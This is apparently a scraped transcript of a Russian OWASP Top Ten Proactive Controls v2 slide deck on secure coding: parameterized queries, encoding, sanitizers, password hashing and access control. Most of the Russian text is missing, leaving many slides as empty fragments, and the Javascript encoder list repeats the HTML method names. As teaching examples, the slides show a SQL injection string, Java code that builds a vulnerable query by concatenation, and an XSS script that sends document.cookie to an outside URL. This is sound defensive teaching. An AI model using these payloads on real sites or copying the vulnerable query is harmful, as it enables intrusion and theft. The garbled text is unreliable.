owasp top ten proactive controls 2 -...
TRANSCRIPT
![Page 1: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/1.jpg)
OWASP Top TenProactive Controls 2.0
![Page 2: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/2.jpg)
OWASP : Core Mission
The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit also registeredin Europe as a worldwide charitable organization focused on improving the security ofsoftware.
Our mission is to make application security visible, so that people and organizations can makeinformed decisions about true application security risks.
Everyone is welcomed to participate in OWASP and all of our materials are available underfree and open software licenses.
![Page 3: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/3.jpg)
OWASP Top Ten Proactive Controls v2 … What’s new ?
Introducing new " proactive controls " to the Top Ten list.
More practical examples (show cases).
A large number of contributors from the (non-)OWASP Community.
Mobile contents : some best practices to consider when building mobile apps (securestorage, authentication, etc.).
![Page 4: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/4.jpg)
OWASP Top Ten Proactive Controls – v21A1 –
A2 –
A3 – A4 –
A5 –
A6 –
A7 –
A8 –
A9 – (Framemework)
,
A10 –
![Page 5: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/5.jpg)
C1:
![Page 6: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/6.jpg)
![Page 7: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/7.jpg)
!
.
OWASP ASVS.
(Proactive Controls),.
![Page 8: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/8.jpg)
The DevOps challenge to security …http://fr.slideshare.net/StephendeVries2/continuous-security-testing-with-devops
DevOps : continuous delivery pipeline.Mature DevOps velocity is fast : build, test and deploy can be entirely automated.Code is deploy to production multiple times. Examples :
Amazon : deploy every 11.6 secondsEtsy : deploy 25+ times/dayGov.uk : deploys 30 times/day
Agile/continuous development process can be interrupted during a sprint by security testing !
![Page 9: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/9.jpg)
Automated Security Testing in a Continuous Delivery Pipeline !http://devops.com/2015/04/06/automated-security-testing-continuous-delivery-pipeline/
An easy approach to include security testing into continuous integration.
Classical/essential security tests can be automated and executed as standard unit/integrationtests.
SecDevOps !
![Page 10: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/10.jpg)
BDD-Security Testing framework http://www.continuumsecurity.net/bdd-intro.html
The BDD-Security framework(Given, When & Then
.
!
:
OWASP ZAP, Nessus, Port Scanning .
Jbehave : « , "story".
![Page 11: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/11.jpg)
BDD-Securityhttp://www.continuumsecurity.net/bdd-intro.html
XSS
Senario: The application should not contain Cross Site Scripting vulnerabilitiesMeta: @id scan_xssGiven a fresh scanner with all policies disabledAnd the attack strength is set to HighAnd the Cross-Site-Scripting policy is enabledWhen the scanner is runAnd false positives described in: tables/false_positives.table are removedThen no medium or higher risk vulnerabilities should be present
Senario: The application should not contain Cross Site Scripting vulnerabilitiesMeta: @id auth_caseWhen the default user logs in with credentials from: users.tableThen the user is logged inWhen the case of the password is changedAnd the user logs in from a fresh login pageThen the user is no logged in
![Page 12: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/12.jpg)
BDD-Security Testing framework http://www.continuumsecurity.net/bdd-intro.html
@Restricted(users = {"admin"}, sensitiveData = "User List")
public void viewUserList() {
driver.get(Config.getInstance().getBaseUrl() + "admin/list");
}
@Restricted , , :
![Page 13: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/13.jpg)
A1 – Injection A2 – Broken Authentication and
Session Management
A3 – Cross-Site Scripting (XSS)
A4 – InsecureDirect Object References
A5 – Security Misconfiguration
A6 – Sensitive Data Exposure
A7 – Missing Function Level Access Control
A8 – Cross-Site Request Forgery
A9 – Using Components with
Known Vulnerabilities
A10 – UnvalidatedRedirects and
Forwards
: !
![Page 14: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/14.jpg)
C2:
![Page 15: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/15.jpg)
Power of SQL Injection …
![Page 16: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/16.jpg)
…
Upper
Lower
Number
Special
Over 16 characters
X' or '1'='1' --
![Page 17: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/17.jpg)
//SQLPreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?");
pstmt.setString(1, newName); pstmt.setString(2, id);
//HQLQuery safeHQLQuery = session.createQuery("from Employees where id=:empId");
safeHQLQuery.setParameter("empId", id);
SQL Injection
String newName = request.getParameter("newName");String id = request.getParameter("id");String query = " UPDATE EMPLOYEES SET NAME="+ newName + " WHERE ID ="+ id;Statement stmt = connection.createStatement();
![Page 18: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/18.jpg)
A1 – Injection A2 – Broken Authentication and
Session Management
A3 – Cross-Site Scripting (XSS)
A4 – InsecureDirect Object References
A5 – Security Misconfiguration
A6 – Sensitive Data Exposure
A7 – Missing Function Level Access Control
A8 – Cross-Site Request Forgery
A9 – Using Components with
Known Vulnerabilities
A10 – UnvalidatedRedirects and
Forwards
![Page 19: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/19.jpg)
C3:
![Page 20: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/20.jpg)
<
![Page 21: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/21.jpg)
<
![Page 22: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/22.jpg)
1 : cookie
Attack 2 :
<script>var badURL='https://owasp.org/somesite/data=' + document.cookie;var img = new Image();img.src = badURL;</script>
<script>document.body.innerHTML='<blink>GO OWASP</blink>';</script>
XSS-
![Page 23: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/23.jpg)
OWASP Java Encoder ProjectOWASP Java HTML Sanitizer Project
Microsoft Encoder and AntiXSS Library
XSS !
XSS- : &
![Page 24: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/24.jpg)
System.Web.Security.AntiXSSMicrosoft.Security.Application. AntiXSS
HTML, HTML- , XML, CSS JavaScript.Native .NET
For use in your User Interface code to defusescript in output
Microsoft Encoder AntiXSS
![Page 25: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/25.jpg)
drop-in
API ( URI URI .). : Java 1.5+ 1.2
OWASP Java Encoder Projecthttps://www.owasp.org/index.php/OWASP_Java_Encoder_Project
2015-04-12 : https://github.com/OWASP/owasp-java-encoder/
![Page 26: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/26.jpg)
OWASP Java Encoder Projecthttps://www.owasp.org/index.php/OWASP_Java_Encoder_Project
HTML Contexts
Encode#forHtmlEncode#forHtmlContentEncode#forHtmlAttributeEncode#forHtmlUnquotedAttribute
XML Contexts
Encode#forXmlEncode#forXmlContentEncode#forXmlAttributeEncode#forXmlCommentEncode#forCDATA
Javascript Contexts
Encode#forHtmlEncode#forHtmlContentEncode#forHtmlAttributeEncode#forHtmlUnquotedAttribute
CSS Contexts
Encode#forCssStringEncode#forCssUrl
URI/URL Contexts
Encode#forUriEncode#forUriComponent
![Page 27: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/27.jpg)
Ruby on Rails :http://api.rubyonrails.org/classes/ERB/Util.html
PHP :http://twig.sensiolabs.org/doc/filters/escape.htmlhttp://framework.zend.com/manual/2.1/en/modules/zend.escaper.introduction.html
Java/Scala (Updated January 2015) :https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
.NET AntiXSS Library (v4.3 NuGet released June 2, 2014) :http://www.nuget.org/packages/AntiXss/
GO :http://golang.org/pkg/html/template/
Reform projecthttps://www.owasp.org/index.php/Category:OWASP_Encoding_Project
![Page 28: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/28.jpg)
LDAP Encoding Functions :ESAPI and .NET AntiXSS
Command Injection Encoding Functions :Careful here !ESAPI
XML Encoding Functions :OWASP Java Encoder
Encoder comparison reference :http://boldersecurity.github.io/encoder-comparison-reference/
![Page 29: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/29.jpg)
A1 – Injection A2 – Broken Authentication and
Session Management
A3 – Cross-Site Scripting (XSS)
A4 – InsecureDirect Object References
A5 – Security Misconfiguration
A6 – Sensitive Data Exposure
A7 – Missing Function Level Access Control
A8 – Cross-Site Request Forgery
A9 – Using Components with
Known Vulnerabilities
A10 – UnvalidatedRedirects and
Forwards
![Page 30: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/30.jpg)
C4:
![Page 31: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/31.jpg)
![Page 32: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/32.jpg)
HTML Sanitizer Java which lets you include HTML authored by third-parties in your web application while protecting against XSS. Written with security best practices in mind, has an extensive test suite, and has undergone adversarial security review
https://code.google.com/p/owasp-java-html-sanitizer/wiki/AttackReviewGroundRules.
POSITIVE. XML config. Caja project that was donated by Google's AppSec team.
High performance and low memory utilization.
OWASP HTML Sanitizer Projecthttps://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
![Page 33: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/33.jpg)
Caja• Caja (pronounced / KAH-hah)[1] Google JavaScript "virtual iframes" ,
object-capabilities. Caja JavaScript , ECMAScript 5 strict mode ), HTML CSS HTML CSS,
JavaScript free variables. , , , .
DOM, wrappers, HTML, URLs, ; Caja phishing ,
cross-site scripting , malware. , ,
; .
• The word "caja" is Spanish for "box" or "safe" (as in a bank), the idea being that Caja can safely contain JavaScript programs as well as being a capabilities-based JavaScript.
• Caja is currently used by Google in its Orkut,[2] Google Sites,[3] and Google Apps Script[4] products; in 2008 MySpace[5][6] and Yahoo![7] and Allianz had both deployed a very early version of Caja but later abandoned it.
![Page 34: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/34.jpg)
OWASP HTML Sanitizer Projecthttps://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
: validate img tags
public static final PolicyFactory IMAGES = new HtmlPolicyBuilder().allowUrlProtocols("http", "https").allowElements("img").allowAttributes("alt", "src").onElements("img").allowAttributes("border", "height", "width").matching(INTEGER).onElements("img").toFactory();
: validate link elements
public static final PolicyFactory LINKS = new HtmlPolicyBuilder().allowStandardUrlProtocols().allowElements("a").allowAttributes("href").onElements("a").requireRelNofollowOnLinks().toFactory();
![Page 35: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/35.jpg)
Pure JavaScript, client side HTML Sanitization with CAJA!http://code.google.com/p/google-caja/wiki/JsHtmlSanitizerhttps://code.google.com/p/google-caja/source/browse/trunk/src/com/google/caja/plugin/html-sanitizer.js
Pythonhttps://pypi.python.org/pypi/bleach
PHPhttp://htmlpurifier.org/ http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/
.NET (v4.3 released June 2, 2014)
AntiXSS.getSafeHTML/getSafeHTMLFragmenthttp://www.nuget.org/packages/AntiXss/https://github.com/mganss/HtmlSanitizer
Ruby on Railshttps://rubygems.org/gems/loofah http://api.rubyonrails.org/classes/HTML.html
![Page 36: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/36.jpg)
Upload +
+
" "crossdomain.xml" "clientaccesspolicy.xml".
, < , (zip, rar), , add-on,
![Page 37: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/37.jpg)
A1 – Injection A2 – Broken Authentication and
Session Management
A3 – Cross-Site Scripting (XSS)
A4 – InsecureDirect Object References
A5 – Security Misconfiguration
A6 – Sensitive Data Exposure
A7 – Missing Function Level Access Control
A8 – Cross-Site Request Forgery
A9 – Using Components with
Known Vulnerabilities
A10 – UnvalidatedRedirects and
Forwards
![Page 38: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/38.jpg)
C5:
![Page 39: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/39.jpg)
![Page 40: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/40.jpg)
![Page 41: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/41.jpg)
1)
, (Django DOS Sept 2013)
![Page 42: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/42.jpg)
2) salt
protect( [salt] + [password] );
32char 64char salt ( );
, salt
![Page 43: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/43.jpg)
3a) ,
PBKDF2([salt] + [password], c=140,000);
PBKDF2 FIPS
Scrypt, , . (bcrypt is also a reasonable choice)
![Page 44: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/44.jpg)
3b)
HMAC-SHA-256( [private key], [salt] + [password] )
,
).
![Page 45: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/45.jpg)
… !
Upper
Lower
Number
Special
Over 8 characters
Password1!
![Page 46: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/46.jpg)
2 , , email, DOB
, https://www.owasp.org/index.php/Choosing_and_Using_Security_Questions_Cheat_Sheet
app, SMS token Verify code
![Page 47: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/47.jpg)
–
![Page 48: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/48.jpg)
Authentication Cheat Sheethttps://www.owasp.org/index.php/Authentication_Cheat_Sheet
Password Storage Cheat Sheethttps://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
Forgot Password Cheat Sheethttps://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet
Session Management Cheat Sheethttps://www.owasp.org/index.php/Session_Management_Cheat_Sheet
ASVS AuthN and Session RequirementsObviously, Identity is a BIG topic !
![Page 49: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/49.jpg)
A1 – Injection A2 – Broken Authentication and
Session Management
A3 – Cross-Site Scripting (XSS)
A4 – InsecureDirect Object References
A5 – Security Misconfiguration
A6 – Sensitive Data Exposure
A7 – Missing Function Level Access Control
A8 – Cross-Site Request Forgery
A9 – Using Components with
Known Vulnerabilities
A10 – UnvalidatedRedirects and
Forwards
![Page 50: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/50.jpg)
C6:
![Page 51: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/51.jpg)
![Page 52: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/52.jpg)
,
,
, “ ”
, ( )
,
, “ ”
,
![Page 53: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/53.jpg)
• :
• :
, ;
![Page 54: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/54.jpg)
,
RBAC
RBAC (Role based access control)
if (user.hasRole("ADMIN")) || (user.hasRole("MANAGER")) {deleteAccount();}
if (user.hasAccess("DELETE_ACCOUNT")) {deleteAccount();}
![Page 55: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/55.jpg)
ASP.NET Roles vs (Claims Authorization)
55
[Authorize(Roles = "Jedi", "Sith")]
public ActionResult WieldLightsaber() {
return View();
}
Role Based
[ClaimAuthorize(Permission="CanWieldLightsaber")]
public ActionResult WieldLightsaber()
{
return View();
}
Claim Based
![Page 56: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/56.jpg)
Claims-Based
• , . ( ,
), , , . , Drivers License,
. . DateOfBirth,
, , 8th June 1970 , , , ,
. For example if you want access to a night club the authorization process
might be:1• The door security officer would evaluate the value of your date of birth claim and
whether they trust the issuer (the driving license authority) before granting you access.•
.
